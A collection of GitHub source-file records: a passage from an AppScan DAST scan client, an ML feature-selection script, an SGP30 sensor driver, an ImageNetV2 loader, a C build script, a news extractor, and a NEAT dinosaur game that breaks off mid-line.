Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\"\r\n }\r\n response = requests.post(REST_SCANS, headers=headers, json=json_data)\r\n response.raise_for_status()\r\n json_data = json.loads(response.text)\r\n return json_data['Id']\r\n except requests.exceptions.RequestException as e:\r\n print(\"Error in start_dast_scan():\\n\" + str(e))\r\n sys.exit(1)\r\n\r\n\r\ndef get_scan_status(token, scan_id):\r\n headers = {\r\n \"accept\": \"application/json\",\r\n \"Authorization\": f\"Bearer {token}\",\r\n }\r\n r = requests.get(f\"https://cloud.appscan.com/api/v2/Scans/DynamicAnalyzer/{scan_id}\", headers=headers)\r\n if r.status_code != 200:\r\n print(f\"Error getting scan status: {r.status_code}\")\r\n return None\r\n response_json = r.json()\r\n return {\r\n \"Status\": response_json.get(\"LatestExecution\", {}).get(\"ExecutionProgress\"),\r\n \"HighVulnerabilities\": response_json.get(\"LatestExecution\", {}).get(\"NHighIssues\"),\r\n \"MediumVulnerabilities\": response_json.get(\"LatestExecution\", {}).get(\"NMediumIssues\"),\r\n \"LowVulnerabilities\": response_json.get(\"LatestExecution\", {}).get(\"NLowIssues\"),\r\n \"ErrorMessage\": response_json.get(\"LatestExecution\", {}).get(\"ErrorMessage\")\r\n }\r\n\r\n\r\ndef generate_report(token, scan_id, scan_name):\r\n url = f\"https://cloud.appscan.com/api/v2/Reports/Security/Scan/{scan_id}\"\r\n\r\n headers = {\r\n 'Content-Type': 'application/json',\r\n 'Authorization': f'Bearer {token}'\r\n }\r\n\r\n body = {\r\n 'Configuration': {\r\n 'Summary': 'true',\r\n 'Details': 'true',\r\n 'Discussion': 'true',\r\n 'Overview': 'true',\r\n 'TableOfContent': 'true',\r\n 'Advisories': 'true',\r\n 'FixRecommendation': 'true',\r\n 'History': 'true',\r\n 'Coverage': 'true',\r\n 'MinimizeDetails': 'true',\r\n 'Articles': 'true',\r\n 'ReportFileType': 'XML',\r\n 'Title': scan_name,\r\n 'Locale': 'en-US',\r\n 'Notes': 'Generated by Python script',\r\n 'Comments': 'true'\r\n }\r\n }\r\n\r\n try:\r\n response = requests.post(url, headers=headers, json=body)\r\n response.raise_for_status()\r\n report_id = response.json().get('Id')\r\n print(f\"Report generated successfully. Report ID: {report_id}\")\r\n return report_id\r\n\r\n except requests.exceptions.RequestException as e:\r\n print(f\"Error generating report: {e}\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"ausmanki/demo","sub_path":"r.py","file_name":"r.py","file_ext":"py","file_size_in_byte":5990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"19365645606","text":"\r\nimport pandas as pd\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nfrom sklearn.ensemble import AdaBoostRegressor\r\nfrom sklearn import linear_model\r\nfrom sklearn import preprocessing\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom sklearn.feature_selection import RFE\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.feature_selection import SelectKBest\r\nfrom sklearn.feature_selection import chi2\r\nfrom sklearn.feature_selection import f_regression\r\n\r\nimport numpy as np\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\n\r\n# https://www.yourdatateacher.com/2021/10/11/feature-selection-with-random-forest/\r\ndef return_new_FeaturesRFE(X_tr, y_tr):\r\n features = list(X_tr.columns.values)\r\n rf = RandomForestRegressor(random_state=0)\r\n\r\n rf.fit(X_tr, y_tr)\r\n\r\n f_i = list(zip(features, rf.feature_importances_))\r\n f_i.sort(key=lambda x: x[1])\r\n plt.barh([x[0] for x in f_i], [x[1] for x in f_i])\r\n\r\n plt.show()\r\n\r\n rfe = RFE(rf, n_features_to_select=12)\r\n\r\n rfe.fit(X_train, y_train)\r\n\r\n selected_features = np.array(features)[rfe.get_support()]\r\n print(selected_features)\r\n return selected_features\r\n\r\ndef return_new_FeaturesSelectKBest(X_tr, y_tr):\r\n\r\n fs = (SelectKBest(f_regression, k=12)).fit(X_tr, y_tr)\r\n print(type(fs))\r\n features =X_tr.columns[fs.get_support()]\r\n print(features)\r\n\r\n return features\r\n\r\ndef models(X_tr, y_tr, X_te, y_te):\r\n reg_RF = RandomForestRegressor(n_estimators=100, random_state=0)\r\n reg_RF.fit(X_tr, y_tr)\r\n print(\"Random Forest Regressor Train Performance \",\r\n mean_squared_error(np.log(y_tr), np.log(reg_RF.predict(X_tr))))\r\n print(\"Random Forest Regressor Test Performance \",\r\n mean_squared_error(np.log(y_te), np.log(reg_RF.predict(X_te))))\r\n\r\n\r\ndf_train = pd.read_csv('TrainTransformed.csv')\r\ndf_test = pd.read_csv('TestTransformed.csv')\r\nX_train, y_train = df_train.loc[:, df_train.columns != 'SalePrice'], df_train.loc[:, df_train.columns == 'SalePrice']\r\nX_test, y_test = df_test.loc[:, df_test.columns != 'SalePrice'], df_test.loc[:, df_test.columns == 'SalePrice']\r\ntest=15\r\n\r\n\r\nX_train_Normal = X_train.astype('float32')\r\nX_test_Normal = X_test.astype('float32')\r\n\r\nX_train_FNormal=X_train_Normal\r\nX_test_FNormal=X_test_Normal\r\n\r\nprint(\"Before Feature Selection \")\r\nmin_max_scaler = preprocessing.MinMaxScaler()\r\nX_train_Normal = min_max_scaler.fit_transform(X_train_Normal)\r\nX_test_Normal = min_max_scaler.transform(X_test_Normal)\r\nmodels(X_train_Normal, y_train, X_test_Normal, y_test)\r\n\r\ncolumns = return_new_FeaturesRFE(X_train, y_train)\r\nX_train_FNormal = X_train_FNormal[columns]\r\nX_test_FNormal = X_test_FNormal[columns]\r\nprint(X_train_FNormal.columns)\r\n\r\nmin_max_scaler = preprocessing.MinMaxScaler()\r\nX_train_FNormal = min_max_scaler.fit_transform(X_train_FNormal)\r\nX_test_FNormal = min_max_scaler.transform(X_test_FNormal)\r\nprint(\"After Feature Selection \")\r\nmodels(X_train_FNormal, y_train, X_test_FNormal, y_test)\r\n\r\n\r\n\r\n\r\n# Random Forest Regressor Train Performance 0.025823662996025752\r\n# Random Forest Regressor Test Performance 0.07690290727784801\r\n\r\n\r\n","repo_name":"OmerMintemur/Feature-Elimination-Using-GA","sub_path":"AmesHouses/BaseModelsFeatSelection.py","file_name":"BaseModelsFeatSelection.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41676346959","text":"# 2018 / MIT / Tim Clem / github.com/misterfifths\n# See LICENSE for details\n# Heavily inspired by the Adafruit CircuitPython implementation by ladyada:\n# https://github.com/adafruit/Adafruit_CircuitPython_SGP30\n# CRC implementation taken entirely from there, in fact.\n\nfrom __future__ import print_function\n\nfrom smbus import SMBus\nfrom collections import namedtuple\nfrom time import sleep\nimport struct\nfrom threading import Lock\nfrom sys import stderr\nfrom math import modf\nfrom datetime import datetime\n\n\nSGP30Command = namedtuple(\n 'SGP30Command',\n 'opcode_bytes required_feature_set parameter_length response_length response_time_ms')\n\n\n_SGP30_CMDS = {\n 'get_serial_number': SGP30Command([0x36, 0x82], None, 0, 9, 1),\n 'get_feature_set_version': SGP30Command((0x20, 0x2f), None, 0, 3, 2),\n\n 'init_air_quality': SGP30Command((0x20, 0x03), 0x20, 0, 0, 10),\n 'measure_air_quality': SGP30Command((0x20, 0x08), 0x20, 0, 6, 12),\n 'get_baseline': SGP30Command((0x20, 0x15), 0x20, 0, 6, 10),\n 'set_baseline': SGP30Command((0x20, 0x1e), 0x20, 6, 0, 10),\n 'set_humidity': SGP30Command((0x20, 0x61), 0x20, 3, 0, 10),\n 'measure_raw_signals': SGP30Command((0x20, 0x50), 0x20, 0, 6, 25)\n}\n\n_SGP30_CRC_INIT = 0xff\n_SGP30_CRC_POLYNOMIAL = 0x31\n\n_SGP30_FEATURE_SET_BITMASK = 0b0000000011100000\n\n\ndef _log(*args):\n print('[SGP30]', *args, file=stderr)\n\n\n_RawSample = namedtuple('RawSample', 'timestamp raw_co2 raw_voc')\nclass RawSample(_RawSample):\n def __new__(cls, raw_co2, raw_voc):\n self = super(RawSample, cls).__new__(cls, datetime.now(), raw_co2, raw_voc)\n return self\n\n_AirQuality = namedtuple('AirQuality', 'timestamp co2_ppm voc_ppb')\nclass AirQuality(_AirQuality):\n def __new__(cls, co2_ppm, voc_ppb):\n self = super(AirQuality, cls).__new__(cls, datetime.now(), co2_ppm, voc_ppb)\n return self\n\n def is_probably_warmup_value(self):\n return self.co2_ppm == 400 and self.voc_ppb == 0\n\n\nclass SGP30(object):\n def __init__(self, smbus, i2c_address=0x58):\n self.i2c_address = i2c_address\n\n self._raw_feature_set = None\n self.chip_version = None\n self.serial_number = None\n\n self._bus = smbus\n self.__bus_lock = Lock()\n\n\n def __enter__(self):\n self.open()\n return self\n\n def __exit__(self, exception_type, exception_value, traceback):\n self.close()\n\n def open(self):\n self.serial_number = self._get_serial_number()\n sn_string = ' '.join('0x{:04x}'.format(x) for x in self.serial_number)\n _log('got serial number: ' + sn_string)\n\n self._raw_feature_set = self._get_feature_set_version()\n self.chip_version = self._raw_feature_set & _SGP30_FEATURE_SET_BITMASK\n _log('chip version: ' + hex(self.chip_version) + ' (raw: ' + hex(self._raw_feature_set) + ')')\n\n _log('initing...')\n self._init_air_quality()\n _log('inited')\n\n def close(self):\n self._bus.close()\n\n\n def _get_serial_number(self):\n return self._run_word_getter('get_serial_number')\n\n def _get_feature_set_version(self):\n # The spec sheet says we should ignore the MSB of this response,\n # and that the last five bits of the LSB are 'subject to change.'\n # Use _has_feature_set() to check its value against another.\n return self._run_word_getter('get_feature_set_version')[0]\n\n def _has_feature_set(self, required_feature_set):\n if required_feature_set is None:\n return True\n\n return self.chip_version == (required_feature_set & _SGP30_FEATURE_SET_BITMASK)\n\n\n def _init_air_quality(self):\n return self._run_command(_SGP30_CMDS['init_air_quality'])\n\n\n def measure_air_quality(self):\n co2_ppm, voc_ppb = self._run_word_getter('measure_air_quality')\n return AirQuality(co2_ppm, voc_ppb)\n\n def get_baseline(self):\n raw_co2, raw_voc = self._run_word_getter('get_baseline')\n return RawSample(raw_co2, raw_voc)\n\n def set_baseline(self, co2_baseline, voc_baseline):\n self._run_word_setter('set_baseline', [co2_baseline, voc_baseline])\n\n def set_humidity(self, humidity_g_per_m3):\n fpart, ipart = modf(humidity_g_per_m3)\n\n assert ipart < 256, 'Humidity must be less than 256 g/m^3'\n\n ipart = int(ipart)\n quantized_fpart = int(round(fpart * 256))\n\n humidity_word = (ipart & 0xff) << 8 | (quantized_fpart & 0xff)\n\n self._set_humidity_raw(humidity_word)\n\n # This takes the raw integer value for the humidity, which is in a weird format (see\n # the spec sheet). Probably just use set_humidity().\n def _set_humidity_raw(self, humidity):\n self._run_word_setter('set_humidity', [humidity])\n\n def measure_raw_signals(self):\n raw_co2, raw_voc = self._run_word_getter('measure_raw_signals')\n return RawSample(raw_co2, raw_voc)\n\n\n def _run_word_getter(self, cmd_name):\n cmd = _SGP30_CMDS[cmd_name]\n assert cmd.parameter_length == 0, 'This method only understands commands that take no parameters'\n assert cmd.response_length % 3 == 0, 'This method only understands commands whose response is a set of (2-byte word + 1-byte checksum) pairs (i.e., the number of response bytes must be divisible by three)'\n\n word_count = cmd.response_length / 3\n raw_bytes = self._run_command(cmd)\n return self._read_checksummed_words(raw_bytes, word_count)\n\n def _run_word_setter(self, cmd_name, words):\n cmd = _SGP30_CMDS[cmd_name]\n assert cmd.response_length == 0, 'This method only understands commands that have no response'\n assert cmd.parameter_length > 0, 'This method only understands commands that take parameters'\n assert cmd.parameter_length % 3 == 0, 'This method only understands commands whose parameter is a set of (2-byte word + 1-byte checksum) pairs (i.e., the number of parameter bytes must be divisible by three)'\n\n param_bytes = self._bytes_for_checksummed_words(words)\n self._run_command(cmd, param_bytes)\n\n\n def _run_command(self, cmd, param_bytes=None):\n assert self._has_feature_set(cmd.required_feature_set), 'Unsupported chip version for this command'\n\n bytes_to_write = list(cmd.opcode_bytes)\n\n if cmd.parameter_length > 0:\n assert len(param_bytes) == cmd.parameter_length, 'Invalid number of parameter bytes for command'\n bytes_to_write.extend(param_bytes)\n\n with self.__bus_lock:\n self.__write_bytes(bytes_to_write)\n sleep(cmd.response_time_ms / 1000.0)\n\n if cmd.response_length > 0:\n return self.__read_bytes(cmd.response_length)\n\n return None\n\n # NOT LOCKED. Use _run_command!\n def __read_bytes(self, length):\n return bytearray(self._bus.read_i2c_block_data(self.i2c_address, 0, length))\n\n # NOT LOCKED. Use _run_command!\n def __write_bytes(self, raw_bytes):\n assert len(raw_bytes) >= 1\n\n cmd_byte = raw_bytes[0]\n arg_bytes = list(raw_bytes[1:]) # bytes may or may not be a tuple\n\n self._bus.write_i2c_block_data(self.i2c_address, cmd_byte, arg_bytes)\n\n @classmethod\n def _read_checksummed_word(cls, data, offset=0):\n word_bytes = data[offset:offset + 2]\n word, checksum = struct.unpack_from('>HB', data, offset)\n assert checksum == cls._crc(word_bytes), 'Bad checksum!'\n return word\n\n @classmethod\n def _read_checksummed_words(cls, data, count):\n res = []\n for i in range(count):\n offset = (2 + 1) * i # 2 bytes + checksum byte\n word = cls._read_checksummed_word(data, offset=offset)\n res.append(word)\n\n return res\n\n @classmethod\n def _bytes_for_checksummed_words(cls, words):\n res = bytearray()\n for word in words:\n # just going to let the error from struct.pack handle the case of the word being > 65536\n word_bytes = bytearray(struct.pack('>H', word))\n res.extend(word_bytes)\n\n res.append(cls._crc(word_bytes))\n\n return res\n\n @classmethod\n def _crc(cls, data):\n crc = _SGP30_CRC_INIT\n # calculates 8-Bit checksum with given polynomial\n for byte in data:\n crc ^= byte\n for _ in range(8):\n if crc & 0x80:\n crc = (crc << 1) ^ _SGP30_CRC_POLYNOMIAL\n else:\n crc <<= 1\n return crc & 0xFF\n","repo_name":"misterfifths/sgp30","sub_path":"sgp30.py","file_name":"sgp30.py","file_ext":"py","file_size_in_byte":8525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"2991857711","text":"from PIL import Image\n\nfrom imagenetv2_pytorch import ImageNetV2Dataset\n\nfrom .imagenet import ImageNet\n\nclass ImageNetV2DatasetWithPaths(ImageNetV2Dataset):\n def __getitem__(self, i):\n img, label = Image.open(self.fnames[i]), int(self.fnames[i].parent.name)\n if self.transform is not None:\n img = self.transform(img)\n return {\n 'images': img,\n 'labels': label,\n 'image_paths': str(self.fnames[i])\n }\n\nclass ImageNetV2(ImageNet):\n def get_test_dataset(self):\n return ImageNetV2DatasetWithPaths(transform=self.preprocess, location=self.location)\n","repo_name":"mlfoundations/wise-ft","sub_path":"src/datasets/imagenetv2.py","file_name":"imagenetv2.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":483,"dataset":"github-code","pt":"78"} +{"seq_id":"32560238182","text":"from pathlib import Path\nfrom datetime import datetime\nimport os\nimport sys\nimport re\n\n\ndef apply(func, *iterables):\n \"\"\" Apply function by getting one element of each elements of iterables. \"\"\"\n for args in zip(*iterables):\n func(*args)\n\n\ndef _p(path):\n return Path(path).resolve()\n\n\nclass Info:\n \"\"\" Basics info of a file. \"\"\"\n\n def __init__(self, path):\n # set of the path of dependences\n self.deps = set()\n\n # the last modification date of the file (min if not exist)\n self.date = datetime.min\n # if the path exist get it's last modification dates\n if path.exists():\n self.date = datetime.fromtimestamp(int(path.stat().st_mtime))\n\n # last depedence modification date (can't be less than it's self)\n self.deps_date = self.date\n\n @property\n def out_dated(self):\n \"\"\" If the file out dated \"\"\"\n return self.date < self.deps_date\n\n\nclass Builder:\n\n regex = re.compile('^#include \"([^\"]*)\"$')\n\n def __init__(self, main, out, src, obj, cc, cflag):\n self.main = _p(main)\n self.out = _p(out)\n self.src = _p(src)\n self.obj = _p(obj)\n self.cc = cc\n self.cflag = f'-I {src} {cflag}'\n\n self.infos = dict()\n\n # build the depencies graph\n self.proccess(self.main)\n # get info the the binnary\n bin_info = self.infos[self.out]\n # upate to get it's dependecies date\n self.update(self.out)\n\n # if the binnary is up to date do noting\n if bin_info.out_dated:\n # build the object files if there were out dated\n apply(self.gcc, filter(self.is_out_dated, bin_info.deps))\n # build the binnary\n self.gcc(self.out, option='')\n else:\n # print message if up to date\n print('Up to date')\n\n def deps_date(self, path):\n \"\"\" The depencies max date of the file. \"\"\"\n return self.infos[path].deps_date\n\n def is_out_dated(self, path):\n \"\"\" If the file is out dated \"\"\"\n return self.infos[path].out_dated\n\n def add(self, path):\n \"\"\" Add the file into the infos and return if we added or not. \"\"\"\n # If file is already init return false\n if path in self.infos:\n return False\n # If it's not inside init it and return true\n else:\n self.infos[path] = Info(path)\n return True\n\n def link(self, src, dep):\n \"\"\" Mark \"dep\" as a Dependence of the \"src\". \"\"\"\n self.add(src)\n self.infos[src].deps.add(dep)\n\n @staticmethod\n def get_deps(file):\n \"\"\" Get the list of the depedency of the file. \"\"\"\n # deps list\n deps = []\n\n # get each match for each line\n for match in map(Builder.regex.match, file):\n # if there is a match\n if match:\n # add it to the dependecy\n deps.append(match.group(1))\n\n # retur the deps list (string)\n return deps\n\n def update(self, path):\n \"\"\" Update the deps_date atribute. \"\"\"\n # the max bwtween it's self and it's dependy dependities dates\n info = self.infos[path]\n info.deps_date = max(\n [info.date] +\n list(map(self.deps_date, info.deps))\n )\n\n def expend(self, src, dst):\n # get the prefix\n start = dst[0]\n\n # if it is a relative path\n if start == '.':\n # calcule path relative to the source file\n path = src.parent / dst\n # if it's a absolute path\n elif start == '/':\n # use the root source dir as reference\n path = self.src / dst\n # if no indication\n else:\n # test each of the possible origins\n path = src.parent / dst # relative\n if not path.exists():\n path = self.src / dst # absolute\n\n # if the path didn't exist return an error\n if not path.exists():\n raise ValueError(f'ERROR: can\\'t find \"{dst}\" from \"{src}\"')\n\n # normalize path to not have the dots paths\n path = path.resolve()\n\n # return the expended path\n return path\n\n @staticmethod\n def is_source_file(path):\n \"\"\" return if the file is a source files \"\"\"\n return path.suffix in ['.c', '.h']\n\n def get_obj(self, path):\n \"\"\" Get the object file path base on the source file. \"\"\"\n # get the path relative to the src path\n src = path.relative_to(self.src)\n # create the object path by using the object dirrectory and replace the\n # suffix\n obj = self.obj / src.with_suffix('.o')\n # normalize the path\n obj.resolve()\n # return it\n return obj\n\n def parse_source(self, path):\n \"\"\" Add all the dependecy by getting the depency of the source file \"\"\"\n with open(path, 'r', encoding='utf8') as file:\n for dep in self.get_deps(file):\n dep = self.expend(path, dep)\n self.proccess(dep)\n self.link(path, dep)\n\n def proccess_module(self, path):\n \"\"\" Get the dependcy of the given modules \"\"\"\n module = path.parent\n # if it's not a module do nothing\n if not module.exists():\n return\n # include all the public and private source\n for access in ['public', 'private']:\n # get the folter\n folder = module / access\n # if the folder exist\n if folder.exists():\n # procces each source files\n for dep in filter(self.is_source_file, folder.iterdir()):\n self.proccess(dep)\n self.link(path, dep)\n\n self.update(path)\n\n def proccess(self, path):\n \"\"\"\n Get reclusively all the dependency of the path and compute it's dependency\n date.\n \"\"\"\n # proccess one time each path\n # don't proccess not existing path\n if self.add(path) and path.exists():\n # get and proccess each depedency of the file\n self.parse_source(path)\n # update the dependency dates\n self.update(path)\n\n # back propagate the header files\n\n # if it is a header get the corresponding source file\n if path.suffix == '.h':\n # proccess basics include\n self.proccess(path.with_suffix('.c'))\n # proccess module\n self.proccess_module(path)\n\n # if it is a source file add the object and linked it to the binnary\n if path.suffix == '.c':\n # get object path\n obj = self.get_obj(path)\n # link the source to the object\n self.link(obj, path)\n # link the object to the binnaty\n self.link(self.out, obj)\n # update the object infos\n self.update(obj)\n\n @staticmethod\n def run_command(command):\n \"\"\" Print and run a command. \"\"\"\n # show the command\n print(' '.join(command))\n # execute the command\n result = os.system(' '.join(command))\n # if there is an error return it\n if result != 0:\n exit(1)\n\n def gcc(self, path, option='-c'):\n \"\"\" Compile the source file base on the option. \"\"\"\n # create output dirrectory if not exist\n path.parent.mkdir(parents=True, exist_ok=True)\n\n # the current dir\n cwd = os.getcwd()\n\n def get_path(path):\n \"\"\" Shotten the path and covert it to string. \"\"\"\n return str(path.relative_to(cwd))\n\n # the the gcc command with the corresponding option\n self.run_command([\n self.cc,\n option, ' '.join(map(get_path, self.infos[path].deps)),\n '-o', get_path(path),\n self.cflag\n ])\n","repo_name":"JulesdeCube/UnCoin","sub_path":"scripts/buidler.py","file_name":"buidler.py","file_ext":"py","file_size_in_byte":7929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11846514504","text":"from datetime import datetime\nfrom typing import Any, Dict\nfrom App.Addons.article_utils import (\n ALLOWED_H,\n LIST_TAGS,\n TABLE_TAGS,\n article_content_transform,\n author_transform,\n brief_transform,\n category_transform,\n headline_transform,\n iso_date_transform,\n keywords_transform,\n)\nfrom cmoncrawl.processor.extraction.utils import (\n get_attribute_transform,\n get_tags_transform,\n get_text_list_transform,\n get_text_transform,\n)\nfrom cmoncrawl.common.types import PipeMetadata\nfrom bs4 import BeautifulSoup, Tag\nfrom App.Addons.article_extractor import ArticleExtractor\n\n\nallowed_classes_div = {\n # text\n \"article__photo\",\n \"infobox\",\n}\n\n\ndef article_fc(tag: Tag):\n if tag.name in [*LIST_TAGS, \"figure\", *TABLE_TAGS]:\n return True\n\n if tag.name in [\"p\", *ALLOWED_H]:\n return True\n\n classes = tag.get(\"class\", [])\n if isinstance(classes, str):\n classes = [classes]\n if tag.name == \"div\" and len(allowed_classes_div.intersection(classes)) > 0:\n return True\n\n return False\n\n\nclass AktualneCZV3Extractor(ArticleExtractor):\n\n def __init__(self):\n\n super().__init__(\n {\n \"headline\": \"meta[property='og:title']\",\n \"keywords\": \"meta[name='keywords']\",\n \"publication_date\": \"meta[property='article:published_time']\",\n \"category\": \"meta[property='article:section']\",\n \"brief\": \"meta[property='og:description']\",\n },\n {\n \"headline\": [get_attribute_transform(\"content\"), headline_transform],\n \"keywords\": [get_attribute_transform(\"content\"), keywords_transform],\n \"publication_date\": [\n get_attribute_transform(\"content\"),\n iso_date_transform,\n ],\n \"category\": [get_attribute_transform(\"content\"), category_transform],\n \"brief\": [get_attribute_transform(\"content\"), brief_transform],\n },\n {\n \"content\": \"div.article__content\",\n \"author\": \"div.author\",\n \"category\": \"div.header__menu > nav > ul > li:nth-child(1) > a\",\n },\n {\n \"content\": article_content_transform(article_fc),\n \"category\": [get_text_transform, category_transform],\n \"author\": [\n get_tags_transform(\"div > a.author__name\"),\n get_text_list_transform(\",\"),\n author_transform,\n ],\n },\n \"body\",\n )\n\n def custom_filter_raw(self, response: str, metadata: PipeMetadata) -> bool:\n parsed = metadata.url_parsed.path.split(\"/\")\n if len(parsed) > 1 and parsed[1] in [\"wiki\"]:\n return False\n return True\n\n def custom_extract(\n self, soup: BeautifulSoup, metadata: PipeMetadata\n ) -> Dict[str, Any]:\n return {\"comments_num\": None}\n\n\nextractor = AktualneCZV3Extractor()\n","repo_name":"hynky1999/Czech-News-Classification-dataset","sub_path":"Processor/CZExtractors/aktualne_cz/aktualne_cz_v3.py","file_name":"aktualne_cz_v3.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"39839101107","text":"import pygame\nimport neat\nimport os\nimport sys\nimport random\nimport math\n\npygame.init()\n\n# Global Constants\npygame.display.set_caption(\"Dino AI\")\nSCREEN_HEIGHT = 600\nSCREEN_WIDTH = 1100\nSCREEN = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\nRUNNING = [pygame.image.load(os.path.join(\"Assets/Dino\", \"DinoRun1.png\")),\n pygame.image.load(os.path.join(\"Assets/Dino\", \"DinoRun2.png\"))]\n\nJUMPING = pygame.image.load(os.path.join(\"Assets/Dino\", \"DinoJump.png\"))\n\nBG = pygame.image.load(os.path.join(\"Assets/Other\", \"Track.png\"))\n\nSMALL_CACTUS = [pygame.image.load(os.path.join(\"Assets/Cactus\", \"SmallCactus1.png\")),\n pygame.image.load(os.path.join(\"Assets/Cactus\", \"SmallCactus2.png\")),\n pygame.image.load(os.path.join(\"Assets/Cactus\", \"SmallCactus3.png\"))]\nLARGE_CACTUS = [pygame.image.load(os.path.join(\"Assets/Cactus\", \"LargeCactus1.png\")),\n pygame.image.load(os.path.join(\"Assets/Cactus\", \"LargeCactus2.png\")),\n pygame.image.load(os.path.join(\"Assets/Cactus\", \"LargeCactus3.png\"))]\n\n\nFONT = pygame.font.Font('freesansbold.ttf', 20)\n\nhighscore = 0\n\n# Dinosaur (\"Player\")\nclass Dinosaur:\n X_POS = 80\n Y_POS = 310\n JUMP_VEL = 8.5\n\n def __init__(self, img=RUNNING[0]):\n self.image = img\n self.dino_run = True\n self.dino_jump = False\n self.jump_vel = self.JUMP_VEL\n self.rect = pygame.Rect(self.X_POS, self.Y_POS, img.get_width(), img.get_height())\n self.color = (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))\n self.step_index = 0\n\n # Update Function\n def update(self):\n if self.dino_run:\n self.run()\n if self.dino_jump:\n self.jump()\n if self.step_index >= 10:\n self.step_index = 0\n\n # Draw Function\n def draw(self, SCREEN):\n SCREEN.blit(self.image, (self.rect.x, self.rect.y))\n pygame.draw.rect(SCREEN, self.color, (self.rect.x, self.rect.y, self.rect.width, self.rect.height), 2)\n for obstacle in obstacles:\n pygame.draw.line(SCREEN, self.color, (self.rect.x + 54, self.rect.y + 12), obstacle.rect.center, 2)\n\n # Running\n def run(self):\n self.image = RUNNING[self.step_index // 5]\n self.rect.x = self.X_POS\n self.rect.y = self.Y_POS\n self.step_index += 1\n\n # Jumping\n def jump(self):\n self.image = JUMPING\n if self.dino_jump:\n self.rect.y -= self.jump_vel * 4\n self.jump_vel -= 0.8\n if self.jump_vel <= -self.JUMP_VEL:\n self.dino_jump = False\n self.dino_run = True\n self.jump_vel = self.JUMP_VEL\n\n# Obstacles\nclass Obstacle:\n def __init__(self, image, number_of_cacti):\n self.image = image\n self.type = number_of_cacti\n self.rect = self.image[self.type].get_rect()\n self.rect.x = SCREEN_WIDTH\n\n # Updating Obstacles\n def update(self):\n self.rect.x -= game_speed\n if self.rect.x < -self.rect.width:\n obstacles.pop()\n\n # Drawing Obstacles\n def draw(self, SCREEN):\n SCREEN.blit(self.image[self.type], self.rect)\n\n# Tall Cactus\nclass CactusBig(Obstacle):\n def __init__(self, image, number_of_cacti):\n super().__init__(image, number_of_cacti)\n self.rect.y = 300\n\n# Small Cactus\nclass CactusSmall(Obstacle):\n def __init__(self, image, number_of_cacti):\n super().__init__(image, number_of_cacti)\n self.rect.y = 325\n\n\n# Population\ndef remove(index):\n Dinos.pop(index)\n ge.pop(index)\n nets.pop(index)\n\n\n# Fetching Distance\ndef distance(pos_a, pos_b):\n dx = pos_a[0]-pos_b[0]\n dy = pos_a[1]-pos_b[1]\n return math.sqrt(dx**2+dy**2)\n\n# Calculating and evaluating Genomes\ndef eval_genomes(genomes, config):\n global game_speed, x_pos_bg, y_pos_bg, obstacles, Dinos, ge, nets, points, highscore\n clock = pygame.time.Clock()\n points = 0\n\n obstacles = []\n Dinos = []\n ge = []\n nets = []\n\n x_pos_bg = 0\n y_pos_bg = 380\n game_speed = 20\n\n for genome_id, genome in genomes:\n Dinos.append(Dinosaur())\n ge.append(genome)\n net = neat.nn.FeedForwardNetwork.create(genome, config)\n nets.append(net)\n genome.fitness = 0\n\n # Calculating Score and Best Score\n def score():\n # Increasing Game Speed\n global points, game_speed, highscore\n points += 1\n if points % 100 == 0:\n game_speed += 1\n #Calculating Best Score\n if points >= highscore:\n highscore = points\n\n # Displaying Score and Best Score\n text = FONT.render(f'Score: {str(points)}', True, (0, 0, 0))\n text_H = FONT.render(f'Best Score: {str(highscore)}', True, (0, 0, 0))\n\n SCREEN.blit(text, (950, 50))\n SCREEN.blit(text_H, (901, 80))\n\n # Displaying Statistics\n def statistics():\n global Dinos, game_speed, ge\n text_1 = FONT.render(f'Dinosaurs Alive: {str(len(Dinos))}', True, (0, 0, 0))\n text_2 = FONT.render(f'Generation: {pop.generation+1}', True, (0, 0, 0))\n text_3 = FONT.render(f'Speed: {str(game_speed)}', True, (0, 0, 0))\n\n SCREEN.blit(text_1, (50, 450))\n SCREEN.blit(text_2, (50, 480))\n SCREEN.blit(text_3, (50, 510))\n\n # Defining Window\n def background():\n global x_pos_bg, y_pos_bg\n image_width = BG.get_width()\n SCREEN.blit(BG, (x_pos_bg, y_pos_bg))\n SCREEN.blit(BG, (image_width + x_pos_bg, y_pos_bg))\n if x_pos_bg <= -image_width:\n x_pos_bg = 0\n x_pos_bg -= game_speed\n\n run = True\n while run:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n SCREEN.fill((255, 255, 255))\n\n for dinosaur in Dinos:\n dinosaur.update()\n dinosaur.draw(SCREEN)\n\n if len(Dinos) == 0:\n break\n\n # Randomly choosing cactus size\n if len(obstacles) == 0:\n rand_int = random.randint(0, 1)\n if rand_int == 0:\n obstacles.append(CactusSmall(SMALL_CACTUS, random.randint(0, 2)))\n elif rand_int == 1:\n obstacles.append(CactusBig(LARGE_CACTUS, random.randint(0, 2)))\n\n for obstacle in obstacles:\n obstacle.draw(SCREEN)\n obstacle.update()\n # Decreasing Fitness on collision\n for i, dinosaur in enumerate(Dinos):\n# ge[i].fitness += 0.1\n# dinosaur.update\n if dinosaur.rect.colliderect(obstacle.rect):\n ge[i].fitness += points\n remove(i)\n\n for i, dinosaur in enumerate(Dinos):\n output = nets[i].activate((dinosaur.rect.y,\n distance((dinosaur.rect.x, dinosaur.rect.y),\n obstacle.rect.midtop)))\n if output[0] > 0.5 and dinosaur.rect.y == 